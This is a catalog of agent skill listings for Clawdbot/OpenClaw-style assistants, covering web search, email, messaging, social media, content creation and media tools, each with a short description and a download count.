Browser CDP MCPverify-on-browserControl browser via Chrome DevTools Protocol - full CDP access1,935
Brave Searchbrave-searchWeb search and content extraction via Brave Search API. Use for searching documentation, facts, or any web content. Lightweight, no browser required.1,829
ResearchresearchDeep research via Gemini CLI — runs in background sub-agent so you don't burn your Claude tokens.1,693
DiscorddiscordUse when you need to control Discord from Clawdbot via the discord tool: send messages, react, post or upload stickers, upload emojis, run polls, manage threads/pins/search, fetch permissions or me...1,325
Spotify Playerspotify-playerTerminal Spotify playback/search via spogo (preferred) or spotify_player.1,242
HimalayahimalayaCLI to manage emails via IMAP/SMTP. Use himalaya to list, read, write, reply, forward, search, and organize emails from the terminal. Supports multiple accounts and message composition with MML (...1,118
RedditredditBrowse, search, post, and moderate Reddit. Read-only works without auth; posting/moderation requires OAuth setup.1,101
EmailemailEmail management and automation. Send, read, search, and organize emails across multiple providers.1,072
Apple Notesapple-notesManage Apple Notes via the memo CLI on macOS (create, view, edit, delete, search, move, and export notes). Use when a user asks Clawdbot to add a note, list notes, search notes, or manage note fo...938
LinkedInlinkedinLinkedIn automation via browser relay or cookies for messaging, profile viewing, and network actions.812
Apple Calendarapple-calendarApple Calendar.app integration for macOS. CRUD operations for events, search, and multi-calendar support.765
GoplacesgoplacesQuery Google Places API (New) via the goplaces CLI for text search, place details, resolve, and reviews. Use for human-friendly place lookup or JSON output for scripts.748
GifgrepgifgrepSearch GIF providers with CLI/TUI, download results, and extract stills/sheets.637
Web Searchweb-searchThis skill should be used when users need to search the web for information, find current content, look up news articles, search for images, or find videos. It uses DuckDuckGo's search API to retur...630
playwright-cliplaywright-cliBrowser automation via Playwright CLI. Open pages, interact with elements, take screenshots, and more. Ideal for coding agents and automated testing workflows.597
Bluesky CLIblueskyRead, post, and interact with Bluesky (AT Protocol) via CLI. Use when user asks to check Bluesky, post to Bluesky, view their Bluesky timeline, search Bluesky, or check Bluesky notifications. Suppo...563
Web Search Plusweb-search-plusUnified search skill with Intelligent Auto-Routing. Uses multi-signal analysis to automatically select between Serper (Google), Tavily (Research), and Exa (Neural) with confidence scoring.552
DuckDuckGo Searchddg-searchPerform web searches using DuckDuckGo. Use when web search is needed and no API key is available or Brave Search is not preferred.532
OutlookoutlookRead, search, and manage Outlook emails and calendar via Microsoft Graph API. Use when the user asks about emails, inbox, Outlook, Microsoft mail, calendar events, or scheduling.519
Polymarketpolymarket-2Query Polymarket prediction markets - check odds, trending markets, search events, track prices.494
Local Placeslocal-placesSearch for places (restaurants, cafes, etc.) via Google Places API proxy on localhost.481
Skills.sh Searchskills-searchSearch skills.sh registry from CLI. Find and discover agent skills from the skills.sh ecosystem.477
LinkedIn CLIlinkedin-cliA bird-like LinkedIn CLI for searching profiles, checking messages, and summarizing your feed using session cookies.466
IMAP Email Readerimap-emailRead and manage email via IMAP (ProtonMail Bridge, Gmail, etc.). Check for new/unread messages, fetch content, search mailboxes, and mark as read/unread. Works with any IMAP server including Proton...416
Tweet Writertweet-writerWrite viral, persuasive, engaging tweets and threads. Uses web research to find viral examples in your niche, then models writing based on proven formulas and X algorithm optimization. Use when cre...403
OracleoracleUse the @steipete/oracle CLI to bundle a prompt plus the right files and get a second-model review (API or browser) for debugging, refactors, design checks, or cross-validation.398
Firecrawl SearchfirecrawlWeb search and scraping via Firecrawl API. Use when you need to search the web, scrape websites (including JS-heavy pages), crawl entire sites, or extract structured data from web pages. Requires F...392
Better Notionbetter-notionFull CRUD for Notion pages, databases, and blocks. Create, read, update, delete, search, and query.376
Reddit (read only - no auth)reddit-readonlyBrowse and search Reddit in read-only mode using public JSON endpoints. Use when the user asks to browse subreddits, search for posts by topic, inspect comment threads, or build a shortlist of link...359
Filesystem ManagementfilesystemAdvanced filesystem operations - listing, searching, batch processing, and directory analysis for Clawdbot355
Reddit Searchreddit-searchSearch Reddit for subreddits and get information about them.336
Flight TrackerflightsTrack flight status, delays, and search routes. Uses FlightAware data.330
Apple Mailapple-mailApple Mail.app integration for macOS. Read inbox, search emails, send emails, reply, and manage messages with fast direct access (no enumeration).330
browshbrowshA modern text-based browser. Renders web pages in the terminal using headless Firefox.325
Web Search by Exaweb-search-exa324
imap-smtp-emailimap-smtp-emailRead and send email via IMAP/SMTP. Check for new/unread messages, fetch content, search mailboxes, mark as read/unread, and send emails with attachments. Works with any IMAP/SMTP server including G...323
Realtime Web Searchsearch-realtime-informationPriority live web search for real-time information319
Reddit Insightsreddit-insightsSearch and analyze Reddit content using semantic AI search via reddit-insights.com MCP server. Use when you need to: (1) Find user pain points and frustrations for product ideas, (2) Discover niche...310
JIRAjiraManage Jira issues, boards, sprints, and projects via the jira-cli. Search, create, update, and transition issues directly from the command line.309
Polymarket Agentpolymarket-agentAutonomous prediction market agent - analyzes markets, researches news, and identifies trading opportunities294
YoutubeyoutubeSearch YouTube videos, get channel info, fetch video details and transcripts using YouTube Data API v3 via MCP server or yt-dlp fallback.289
Apple Contactsapple-contactsLook up contacts from macOS Contacts.app. Use when resolving phone numbers to names, finding contact info, or searching the address book.268
Exaexa-plusNeural web search via Exa AI. Search people, companies, news, research, code. Supports deep search, domain filters, date ranges.237
Clippy - Microsoft 365 CLIclippyMicrosoft 365 / Outlook CLI for calendar and email. Use when managing Outlook calendar (view, create, update, delete events, find meeting times, respond to invitations), sending/reading emails, or ...237
Apple Docsapple-docsQuery Apple Developer Documentation, APIs, and WWDC videos (2014-2025). Search SwiftUI, UIKit, Objective-C, Swift frameworks and watch sessions.225
apple-mail-search-safeapple-mail-searchFast & safe Apple Mail search with body content support.220
TMDb - Movie DatabasetmdbSearch movies/TV, get cast, ratings, streaming info, and personalized recommendations via TMDb API.218
Apple Musicapple-musicSearch Apple Music, add songs to library, manage playlists, control playback and AirPlay.211
Alexa CLIalexa-cliControl Amazon Alexa devices and smart home via the alexacli CLI. Use when a user asks to speak/announce on Echo devices, control lights/thermostats/locks, send voice commands, or query Alexa.210
Shopping Expertshopping-expertFind and compare products online (Google Shopping) and locally (stores near you). Auto-selects best products based on price, ratings, availability, and preferences. Generates shopping list with buy...209
Plex Media ServerplexControl Plex Media Server - browse libraries, search, play media, manage playback.206
AutoFillIn - Browser Form Automation SkillautofillinAutomated web form filling and file uploading skill with Playwright browser automation. Handles login persistence, form detection, file uploads, and waits for manual confirmation before submission.204
Google Adsgoogle-adsQuery, audit, and optimize Google Ads campaigns. Supports two modes: (1) API mode for bulk operations with google-ads Python SDK, (2) Browser automation mode for users without API access - just att...196
Polymarket Oddspolymarket-3Query Polymarket prediction market odds and events via CLI. Search for markets, get current prices, list events by category. Supports sports betting (NFL, NBA, soccer/EPL, Champions League), politi...194
SonarrsonarrSearch and add TV shows to Sonarr. Supports monitor options, search-on-add.194
x-twittertwitter-openclawInteract with Twitter/X — read tweets, search, post, like, retweet, and manage your timeline.190
Crypto Trackercrypto-trackerTrack crypto prices, set alerts, and search coins via CoinGecko API.189
Bear Notesbear-notesCreate, search, and manage Bear notes via grizzly CLI.187
Apple Photosapple-photosApple Photos.app integration for macOS. List albums, browse photos, search by date/person/content, export photos.186
A simple Flight Trackerflight-trackerFlight tracking and scheduling. Track live flights in real-time by region, callsign, or airport using OpenSky Network. Search flight schedules between airports. Use for queries like "What flights a...186
Apple Mail Searchapple-mail-search-2Fast Apple Mail search via SQLite on macOS. Search emails by subject, sender, date, attachments - results in ~50ms vs 8+ minutes with AppleScript. Use when asked to find, search, or list emails.182
Antigravity Image Generatorantigravity-image-genGenerate images using the internal Google Antigravity API (Gemini 3 Pro Image). High quality, native generation without browser automation.175
RadarrradarrSearch and add movies to Radarr. Supports collections, search-on-add option.175
Homebrew Package ManagerhomebrewHomebrew package manager for macOS. Search, install, manage, and troubleshoot packages and casks.167
Competitive Intelligence & Market Researchcompetitive-intelligence-market-researchB2B SaaS competitive intelligence with 24 scenarios across Sales/HR/Fintech/Ops Tech166
Reddit Clireddit-cliReddit CLI using cookies for authentication. Read posts, search, and get subreddit info.166
Bright DatabrightdataWeb scraping and search via Bright Data API. Requires BRIGHTDATA_API_KEY and BRIGHTDATA_UNLOCKER_ZONE. Use for scraping any webpage as markdown (bypassing bot detection/CAPTCHA) or searching Google...148
Job Auto Applyjob-auto-applyAutomated job search and application system for Clawdbot. Use when the user wants to search for jobs and automatically apply to positions matching their criteria. Handles job searching across Linke...146
Kagi Searchkagi-searchWeb search using Kagi Search API. Use when you need to search the web for current information, facts, or references. Requires KAGI_API_KEY in the environment.145
ApolloapolloInteract with Apollo.io REST API (people/org enrichment, search, lists).143
Last 30 Days (Lite)last30days-2Research any topic across Reddit, X/Twitter, and the web from the last 30 days. Synthesizes findings into actionable insights or copy-paste prompts.143
LinkedIn Automation by Zich (BradAI's OpenClaw)linkedin-automatorAutomate LinkedIn content creation, posting, engagement tracking, and audience growth. Use for posting content, scheduling posts, analyzing engagement metrics, generating content ideas, commenting ...128
xAI Searchxai-searchSearch X/Twitter and the web in real-time using xAI's Grok API with agentic search tools.128
Macos Spm App Packagingmacos-spm-app-packagingScaffold, build, and package SwiftPM-based macOS apps without an Xcode project. Use when you need a from-scratch macOS app layout, SwiftPM targets/resources, a custom .app bundle assembly script, o...127
Telegram CLItgTelegram CLI for reading, searching, and sending messages. Use when the user asks about Telegram messages, wants to check inbox, search chats, send messages, or look up contacts and groups.124
Notion API Toolsnotion-apiGeneric Notion API CLI (Node) for search, querying data sources (databases), and creating pages. Configure with NOTION_KEY (or ~/.config/notion/api_key).116
SEO DataForSEOseo-dataforseoSEO keyword research using the DataForSEO API. Perform keyword analysis, YouTube keyword research, competitor analysis, SERP analysis, and trend tracking. Use when the user asks to: research keywor...109
X Articlesx-articlesCreate and publish X (Twitter) Articles with viral formatting, hook patterns, and browser automation. Handles Draft.js quirks, embed limitations, and image uploads.107
Local web search using SearXNGsearxng-2Search the web using a self-hosted SearXNG metasearch engine. Aggregates Google, Brave, DuckDuckGo, and more without API keys.105
Search Redditsearch-redditSearch Reddit in real time using OpenAI web_search with enrichment (engagement + top comments). Use when you need recent Reddit threads, subreddit-filtered results, or quick link lists.101
Brave Imagesbrave-imagesSearch for images using Brave Search API. Use when you need to find images, pictures, photos, or visual content on any topic. Requires BRAVE_API_KEY environment variable.100
YouTube API CLIyt-api-cliManage your YouTube account from the command line. Complete CLI for YouTube Data API v3 - list/search videos, upload, manage playlists, and more.100
xkcdxkcdFetch xkcd comics - latest, random, by number, or search by keyword. Display comics with title, image, and alt text (the hidden joke). Generate custom xkcd-style stick figure comics using image gen...99
ClawflowsclawflowsSearch, install, and run multi-skill automations from clawflows.com. Combine multiple skills into powerful workflows with logic, conditions, and data flow between steps.98
gkeepgkeepGoogle Keep notes via gkeepapi. List, search, create, and manage notes.98
Demo Video Creatordemo-videoCreate product demo videos by automating browser interactions and capturing frames. Use when the user wants to record a demo, walkthrough, product showcase, or interactive video of a web applicatio...97
YouTube Analyticsyoutube-analyticsYouTube Data API v3 analytics toolkit. Analyze YouTube channels, videos, and search results. Use when the user asks to: check YouTube channel stats, analyze video performance, compare channels, sea...95
openclaw-feedsopenclaw-feedsRSS news aggregator. Fetches headlines from curated feeds across three categories: news, games, and finance. Use when the user asks about current news, headlines, what's happening, what's going on,...93
Searxng Web Searchsearxng-web-searchSearch the web using SearXNG. Use when you need current information, research topics, find documentation, verify facts, or look up anything beyond your knowledge. Returns ranked results with titles...91
Google Maps Grounding MCPgrounding-liteGoogle Maps Grounding Lite MCP for location search, weather, and routes via mcporter.91
PaperlesspaperlessInteract with Paperless-NGX document management system via ppls CLI. Search, retrieve, upload, and organize documents.91
Voice Wake Sayvoice-wake-saySpeak responses aloud on macOS using the built-in say command when user input indicates Voice Wake/voice recognition (for example, messages starting with "User talked via voice recognition on <de...90
BeeperbeeperSearch and browse local Beeper chat history (threads, messages, full-text search).90
spotsspotsExhaustive Google Places search using grid-based scanning. Finds ALL places, not just what Google surfaces.89
Moltbot Securitymoltbot-securitySecurity hardening guide for Moltbot/Clawdbot. Lock down your gateway, fix file permissions, set up auth, configure firewalls. Based on real vulnerability research.89
ProtonMailprotonmailRead, search, and scan ProtonMail via IMAP bridge (Proton Bridge or hydroxide). Includes daily digest for important emails.86
GraphitigraphitiKnowledge graph operations via Graphiti API. Search facts, add episodes, and extract entities/relationships.85
Premium Domain Searchpremium-domainsSearch for premium domains for sale across Afternic, Sedo, Atom, Dynadot, Namecheap, NameSilo, and Unstoppable Domains.84
SerpAPIserpapiUnified search API across Google, Amazon, Yelp, OpenTable, Walmart, and more. Use when searching for products, local businesses, restaurants, shopping, images, news, or any web search. One API key,...83
Research Trackerresearch-tracker82
google-searchgoogle-searchSearch the web using Google Custom Search Engine (PSE). Use this when you need live information, documentation, or to research topics and the built-in web_search is unavailable.81
Discord Chatdiscord-chatSend messages, reply to messages, and search message history in Discord channels using the message tool. Use when the user wants to communicate with Discord (send/reply/search messages), check Disc...79
Promptify SkillpromptifyOptimize prompts for clarity and effectiveness. Use when user says "improve this prompt", "optimize my prompt", "make this clearer", or provides vague/unstructured prompts. Intelligently routes to ...78
Servicenow Docsservicenow-docsSearch and retrieve ServiceNow documentation, release notes, and developer docs (APIs, references, guides). Uses docs.servicenow.com via Zoomin and developer.servicenow.com APIs for developer topics.77
Guru MCPguru-mcpAccess Guru knowledge base via MCP - ask AI questions, search documents, create drafts, and update cards. Connects to all your Guru sources including Slack, Drive, Confluence, and SharePoint.77
Better Polymarketbetter-polymarketQuery Polymarket prediction markets - check odds, trending markets, search events, track prices, list markets by volume.70
Jina Readerjina-readerWeb content extraction via Jina AI Reader API. Three modes: read (URL to markdown), search (web search + full content), ground (fact-checking). Extracts clean content without exposing server IP.67
ConfluenceconfluenceSearch and manage Confluence pages and spaces using confluence-cli. Read documentation, create pages, and navigate spaces.66
What's appwacli-2Send WhatsApp messages to other people or search/sync WhatsApp history via the wacli CLI (not for normal user chats).66
TrakttraktTrack and view your watched movies and TV shows via trakt.tv. Use when user asks about their watch history, what they've been watching, or wants to search for movies/shows.64
Paperless-ngxpaperless-ngxInteract with Paperless-ngx document management system via REST API. Use when users want to search, upload, download, organize documents, manage tags, correspondents, or document types in their Pap...60
GonggongGong API for searching calls, transcripts, and conversation intelligence. Use when working with Gong call recordings, sales conversations, transcripts, meeting data, or conversation analytics. Supp...60
Otter.ai TranscriptionotterOtter.ai transcription CLI - list, search, download, and sync meeting transcripts to CRM.60
Browser Cashbrowser-cashSpin up unblocked browser sessions via Browser.cash for web automation. Sessions bypass anti-bot protections (Cloudflare, DataDome, etc.) making them ideal for scraping and automation.60
Picnic GrocerypicnicOrder groceries from Picnic supermarket - search products, manage cart, schedule delivery.60
EvoWeb.ai Website Builderevowebai-website-builderCreate a Website Designed to Bring Clients from ChatGPT, Gemini & Modern Search59
Clinkding - Linkding Bookmark IntegrationclinkdingManage linkding bookmarks - save URLs, search, tag, organize, and retrieve your personal bookmark collection. Use when the user wants to save links, search bookmarks, manage tags, or organize their...57
Fabric.co API skillfabric-apiCreate/search Fabric resources via HTTP API (notepads, folders, bookmarks, files).57
Slack - CLI for macOS, so your agents can read and send messages 💬slack-personalRead, send, search, and manage Slack messages via the slk CLI. Use when the user asks to check Slack, read channels, send Slack messages, search Slack, check unreads, manage drafts, view saved item...57
FathomfathomConnect to Fathom AI to fetch call recordings, transcripts, and summaries. Use when user asks about their meetings, call history, or wants to search past conversations.56
GifHorsegifhorseSearch video dialogue and create reaction GIFs with timed subtitles. Perfect for creating meme-worthy clips from movies and TV shows.56
MeetGeekmeetgeekQuery MeetGeek meeting intelligence from CLI - list meetings, get AI summaries, transcripts, action items, and search across all your calls with natural language.56
SearXNG Self-Hosted Searchsearxng-3Search the web using a self-hosted SearXNG instance. Privacy-respecting metasearch that aggregates results from multiple engines.56
Bear BlogbearblogCreate and manage blog posts on Bear Blog (bearblog.dev). Supports extended Markdown, custom attributes, and browser-based publishing.55
LinkdinglinkdingManage bookmarks with Linkding. Use when the user asks to "save a bookmark", "add link", "search bookmarks", "list my bookmarks", "find saved links", "tag a bookmark", "archive bookmark", "check if...55
Molt ResearchmoltresearchMolt Research 🦞 - AI research collaboration platform. Verify you're not human, propose research, contribute analysis, peer review, earn bounties, and build collective intelligence. Use when doing r...54
NPM Searchnpm-searchSearch npm packages. Use for finding Node.js/JavaScript packages, libraries, and tools.54
x-twitter2twitter-openclaw-2Interact with Twitter/X — read tweets, search, post, like, retweet, and manage your timeline.53
Finance Trackerfinance-trackerTrack personal expenses with natural language. Log spending, view reports, search transactions. Works with any AI model.52
A nach B - AT Public Transport Service (VOR)anachbAustrian public transport (VOR AnachB) for all of Austria. Query real-time departures, search stations/stops, plan routes between locations, and check service disruptions. Use when asking about Aus...52

Communication & Email

SkillInstall NameDescriptionDownloads
GoggogGoogle Workspace CLI for Gmail, Calendar, Drive, Contacts, Sheets, and Docs.5,611
Caldav Calendarcaldav-calendarSync and query CalDAV calendars (iCloud, Google, Fastmail, Nextcloud, etc.) using vdirsyncer + khal. Works on Linux.2,265
SlackslackUse when you need to control Slack from Clawdbot via the slack tool, including reacting to messages or pinning/unpinning items in Slack channels or DMs.1,373
Google Workspace (No Cloud Console)google-workspaceGmail, Calendar, Drive, Docs, Sheets — NO Google Cloud Console required. Just OAuth sign-in. Zero setup complexity vs traditional Google API integrations.1,313
Morning Email Rollupmorning-email-rollupDaily morning rollup of important emails and calendar events at 8am with AI-generated summaries509
Telegram Bot Buildertelegram-botBuild and manage Telegram bots via the Telegram Bot API. Create bots, send messages, handle webhooks, manage groups and channels.340
Polymarket Analysispolymarket-analysisAnalyze Polymarket prediction markets for trading edges. Pair Cost arbitrage, whale tracking, sentiment analysis, momentum signals, user profile tracking. No execution.176
Table Imagetable-imageGenerate images from tables for better readability in messaging apps like Telegram. Use when displaying tabular data.158
Discord Voicediscord-voiceReal-time voice conversations in Discord voice channels with Claude AI148
Prompt defenseprompt-defenseDetect and block prompt injection attacks in emails. Use when reading, processing, or summarizing emails. Scans for fake system outputs, planted thinking blocks, instruction hijacking, and other in...134
Telegram Composetelegram-composeCompose rich, readable Telegram messages using HTML formatting via direct Telegram API. Use when: (1) Sending any Telegram message beyond a simple one-line reply, (2) Creating structured messages w...131
TTS WhatsApptts-whatsappSend high-quality text-to-speech voice messages on WhatsApp in 40+ languages with automatic delivery131
Telegram Offline Voicetelegram-offline-voice本地生成 Telegram 语音消息,无需 API Token。119
Vocal Chatwalkie-talkieHandles voice-to-voice conversations on WhatsApp. Automatically transcribes incoming audio and responds with local TTS audio. Use when the user wants to "talk" instead of type.116
Walkie-Talkie Modewalkie-talkie-2Handles voice-to-voice conversations on WhatsApp. Automatically transcribes incoming audio and responds with local TTS audio. Use when the user wants to "talk" instead of type.93
ResendresendManage received (inbound) emails and attachments via Resend API. Use when user asks about their emails, received messages, or email attachments.91
Discord Doctordiscord-doctorQuick diagnosis and repair for Discord bot, Gateway, OAuth token, and legacy config issues. Checks connectivity, token expiration, and cleans up old Clawdis artifacts.84
Local Whisperwhisper-mlx-localFree local speech-to-text for Telegram and WhatsApp using MLX Whisper on Apple Silicon. Private, no API costs.68
CamelCamelCamel Alertscamelcamelcamel-alertsMonitor CamelCamelCamel price drop alerts via RSS and send Telegram notifications when items go on sale. Use when setting up automatic price tracking for Amazon products with CamelCamelCamel price ...65
WhatsApp video makerwhatsapp-video-mockup64
moltguardmoltguardGuard agent for AI agents — scan emails and webpages for prompt injection, jailbreak, phishing, and malware.55
Security Audit (Sona)security-audit-2Fail-closed security auditing for OpenClaw/ClawHub skills & repos: trufflehog secrets scanning, semgrep SAST, prompt-injection/persistence signals, and supply-chain hygiene checks before enabling o...50

Social Media

SkillInstall NameDescriptionDownloads
X Trendsx-trendsFetches current top trending topics on X (Twitter) for any country using public aggregators.631
TwittertwitterTwitter/X platform integration. Post tweets, read timeline, manage followers, and analyze engagement.477
Yt Dlp Downloaderyt-dlp-downloaderDownload videos from YouTube, Bilibili, Twitter, and thousands of other sites using yt-dlp. Use when the user provides a video URL and wants to download it, extract audio (MP3), download subtitles,...388
InstagraminstagramInstagram platform integration. Post content, manage stories, view insights, and engage with followers.357
TikToktiktokTikTok platform integration. Manage videos, view analytics, and track engagement.141
Linkedin Monitorlinkedin-monitorBulletproof LinkedIn inbox monitoring with progressive autonomy. Monitors messages hourly, drafts replies in your voice, and alerts you to new conversations. Supports 4 autonomy levels from monitor...109
Instagram Skill via cyberdrk/gram CLIgramInstagram CLI for viewing feeds, posts, profiles, and engagement via cookies.99
SoloBuddysolobuddyBuild-in-public companion for indie hackers — content workflow, Twitter engagement, project soul creation. A living assistant, not a tool.99
X Algorithmx-algorithmX (Twitter) algorithm rules, viral strategies, and article best practices. Boost engagement, avoid reach death, write posts that actually perform.92
LinkedIn Inbox Managerlinkedin-inboxLinkedIn inbox management with scheduled scanning, auto-draft responses following user's communication style, and approval workflows. Use when monitoring LinkedIn messages, drafting replies, managi...77
X Algorithm Masteryx-masteryComplete X (Twitter) algorithm mastery - engagement weights, viral formulas, shadow ban avoidance, thread optimization, and growth strategies. Based on X's open-source code analysis and real creato...61

Content & Writing

SkillInstall NameDescriptionDownloads
YouTube Watcheryoutube-watcherFetch and read transcripts from YouTube videos. Use when you need to summarize a video, answer questions about its content, or extract information from it.2,127
Marketing Modemarketing-modeMarketing Mode combines 23 comprehensive marketing skills covering strategy, psychology, content, SEO, conversion optimization, and paid growth. Use when users need marketing strategy, copywriting,...1,777
BlogwatcherblogwatcherMonitor blogs and RSS/Atom feeds for updates using the blogwatcher CLI.943
YouTube Transcriptyoutube-transcriptFetch and summarize YouTube video transcripts. Use when asked to summarize, transcribe, or extract content from YouTube videos. Handles transcript fetching via residential IP proxy to bypass YouTub...840
Marketing Skillsmarketing-skills629
PowerPoint Creatorpptx-creatorCreate professional PowerPoint presentations from outlines, data sources, or AI-generated content. Supports custom templates, style presets, charts/tables from data, and AI-generated images. Use wh...341
Ai Pdf Builderai-pdf-builderGenerate professional PDFs from Markdown using Pandoc and LaTeX with AI-powered content generation. Creates whitepapers, term sheets, memos, agreements, SAFEs, NDAs, and more.283
Create Contentcreate-contentThinking partner that transforms ideas into platform-optimized content268
HubSpothubspotHubSpot CRM and CMS API integration for contacts, companies, deals, owners, and content management.224
De-AI-ifyde-ai-ifyRemove AI-generated jargon and restore human voice to text214
Social Media Managementcontent-writing-thought-leadershipB2B content writing with daily workflows and batching systems across Sales/HR/Fintech/Ops Tech175
Content Writing & Thought Leadershipcontent-writing-thought-leadership-2B2B content writing with daily workflows and batching systems across Sales/HR/Fintech/Ops Tech139
Newsletter Digestnewsletter-digestSummarize newsletters and articles, extract key insights, create reading lists118
Creative Thought Partnercreative-thought-partnerA conversational creative thought partner that reveals hidden brilliance in your ideas through critical observations and paradox hunting. Use when someone wants to explore ideas, discover breakthro...102
Landing Page Generatorlanding-genGenerate a beautiful HTML landing page from your package.json. Use when you need a quick marketing page for your project.101
Content Advisory (Kids-In-Mind Style)content-advisoryLookup detailed content ratings for movies and TV shows (sex/nudity, violence/gore, language) from Kids-In-Mind.73
Audio Content Generatoraudio-genGenerate audiobooks, podcasts, or educational audio content on demand. User provides an idea or topic, Claude AI writes a script, and ElevenLabs converts it to high-quality audio. Supports multiple...72
✂️ ClipItclipitThe master tool for all advanced audio/video processing. Use this to trim, cut, find segments, isolate vocals, or dub content from YouTube URLs or local files.68
Audio Replyaudio-replyGenerate audio replies using TTS. Trigger with "read it to me [URL]" to fetch and read content aloud, or "talk to me [topic]" to generate a spoken response. Also responds to "speak", "say it", "voi...62
Meta Tags Generatormeta-tags-genScan pages and generate missing meta tags. Use when improving SEO.59
MinifluxminifluxBrowse, read, and manage Miniflux feed articles. Use when Claude needs to work with RSS/atom feeds via Miniflux - listing unread/new articles, reading article content, marking articles as read, and...58
Critical Article Writercritical-article-writerGenerate draft articles, outlines, and editorial content matching a distinctive analytical, skeptical voice with sharp critical commentary, conversational tone, and strategic humor.57
SF Symbol generatorsfsymbol-generatorGenerate an Xcode SF Symbol asset catalog .symbolset from an SVG. Use when you need to add a custom SF Symbol (build-time) by creating the symbolset folder, Contents.json, and SVG file.51
NudocsnudocsUpload, edit, and export documents via Nudocs.ai. Use when creating shareable document links for collaborative editing, uploading markdown/docs to Nudocs for rich editing, or pulling back edited co...50

Video & YouTube

SkillInstall NameDescriptionDownloads
SummarizesummarizeSummarize URLs or files with the summarize CLI (web, PDFs, images, audio, YouTube).4,063
Video Framesvideo-framesExtract frames or short clips from videos using ffmpeg.761
Markdown Convertermarkdown-converterConvert documents and files to Markdown using markitdown. Use when converting PDF, Word (.docx), PowerPoint (.pptx), Excel (.xlsx, .xls), HTML, CSV, JSON, XML, images (with EXIF/OCR), audio (with t...681
YouTube Summarizeryoutube-summarizerAutomatically fetch YouTube video transcripts, generate structured summaries, and send full transcripts to messaging platforms. Detects YouTube URLs and provides metadata, key insights, and downloa...591
Openai Whisper Apiopenai-whisper-apiTranscribe audio via OpenAI Audio Transcriptions API (Whisper).571
Video Transcript Downloadervideo-transcript-downloaderDownload videos, audio, subtitles, and clean paragraph-style transcripts from YouTube and any other yt-dlp supported site. Use when asked to “download this video”, “save this clip”, “rip audio”, “g...553
Remotionremotion-best-practicesBest practices for Remotion - Video creation in React457
Local Whisperlocal-whisperLocal speech-to-text using OpenAI Whisper. Runs fully offline after model download. High quality transcription with multiple model sizes.316
AI media generation API - Flux2pro, Veo3.1, Suno Aivap-mediaAI image, video, and music generation. Flux, Veo 3.1, Suno V5.285
VeoveoGenerate video using Google Veo (Veo 3.1 / Veo 3.0).279
Remotion Video Toolkitremotion-video-toolkitComplete toolkit for programmatic video creation with Remotion + React. Covers animations, timing, rendering (CLI/Node.js/Lambda/Cloud Run), captions, 3D, charts, text effects, transitions, and med...268
Remotion Best Practicesremotion-best-practices-2Best practices for Remotion - Video creation in React264
Remotion Serverremotion-serverHeadless video rendering with Remotion. Works on any Linux server - no Mac or GUI needed. Templates for chat demos, promos, and more.258
Faster Whisperfaster-whisperLocal speech-to-text using faster-whisper. 4-6x faster than OpenAI Whisper with identical accuracy; GPU acceleration enables ~20x realtime transcription. Supports standard and distilled models with...204
Google Gemini Mediagoogle-gemini-mediaUse the Gemini API (Nano Banana image generation, Veo video, Gemini TTS speech and audio understanding) to deliver end-to-end multimodal media workflows and code templates for "generation + underst...174
Gemini YouTube Video Transcriptgemini-yt-video-transcriptCreate a verbatim transcript for a YouTube URL using Google Gemini (speaker labels, paragraph breaks; no time codes). Use when the user asks to transcribe a YouTube video or wants a clean transcrip...172
Granola Meeting TranscriptsgranolaAccess Granola meeting transcripts and notes.157
Transcribee 🐝transcribeeTranscribe YouTube videos and local audio/video files with speaker diarization. Use when user asks to transcribe a YouTube URL, podcast, video, or audio file. Outputs clean speaker-labeled transcri...149
AI Phone Calls (Bland AI)phone-callsMake AI-powered phone calls via Bland AI - book restaurants, make appointments, inquire about services. The AI calls on your behalf and reports back with transcripts.138
Youtube Instant Articleyoutube-instant-articleTransform YouTube videos into Telegraph Instant View articles with visual slides and timestamped summaries. Use this skill whenever a user shares a YouTube URL (youtube.com or youtu.be) and asks to...128
Ai Video Genai-video-genEnd-to-end AI video generation - create videos from text prompts using image generation, video synthesis, voice-over, and editing. Supports OpenAI DALL-E, Replicate models, LumaAI, Runway, and FFmp...113
FFmpeg CLIffmpeg-cli110
AssemblyAI advanced speech transcriptionassemblyai-transcribeTranscribe audio/video with AssemblyAI (local upload or URL), plus subtitles + paragraph/sentence exports.91
Media Backupmedia-backupArchive Clawdbot conversation media (photos, videos) to a local folder. Works with any sync service (Dropbox, iCloud, Google Drive, OneDrive).89
YouTube Musicytmusic-librarianManage YouTube Music library, playlists, and discovery via ytmusicapi.66
ffmpeg-video-editorffmpeg-video-editorGenerate FFmpeg commands from natural language video editing requests - cut, trim, convert, compress, change aspect ratio, extract audio, and more.60
Venice AI Mediavenice-ai-mediaGenerate, edit, and upscale images; create videos from images or other videos via Venice AI. Supports text-to-image, image-to-video (Sora, WAN), video-to-video (Runway Gen4), upscaling, and AI edit...56
AI media generation- Flux2pro,Google Veo3.1, Suno Ai..vap-media-2AI image, video, and music generation. Flux, Veo 3.1, Suno V5.53

Audio & Speech

SkillInstall NameDescriptionDownloads
Openai Whisperopenai-whisperLocal speech-to-text with the Whisper CLI (no API key).1,296
SagsagElevenLabs text-to-speech with mac-style say UX.861
News Summarynews-summaryThis skill should be used when the user asks for news updates, daily briefings, or what's happening in the world. Fetches news from trusted international RSS feeds and can create voice summaries.729
Voice Transcribevoice-transcribeTranscribe audio files using OpenAI's gpt-4o-mini-transcribe model with vocabulary hints and text replacements. Requires uv (https://docs.astral.sh/uv/).438
SpotifyspotifyControl Spotify playback on macOS. Play/pause, skip tracks, control volume, play artists/albums/playlists. Use when a user asks to play music, control Spotify, change songs, or adjust Spotify volume.297
SongseesongseeGenerate spectrograms and feature-panel visualizations from audio with the songsee CLI.262
OpenAI TTSopenai-ttsText-to-speech via OpenAI Audio Speech API.237
Elevenlabs Voiceselevenlabs-voicesHigh-quality voice synthesis with 18 personas, 32 languages, sound effects, batch processing, and voice design using ElevenLabs API.233
Gemini STTgemini-sttTranscribe audio files using Google's Gemini API or Vertex AI144
Transcribe audio files via OpenRouter using audio-capable modelsopenrouter-transcribeTranscribe audio files via OpenRouter using audio-capable models (Gemini, GPT-4o-audio, etc).141
Invoice Generatorinvoice-generatorGenerate professional PDF invoices from JSON data. Use when the user needs to create an invoice, billing document, or payment request with company/client details and line items.135
StripestripeStripe payment platform integration. Manage payments, subscriptions, invoices, and customers via Stripe API.120
ElevenLabs Speech-to-Textelevenlabs-sttTranscribe audio files using ElevenLabs Speech-to-Text (Scribe v2).118
Mlx Whispermlx-whisperLocal speech-to-text with MLX Whisper (Apple Silicon optimized, no API key).107
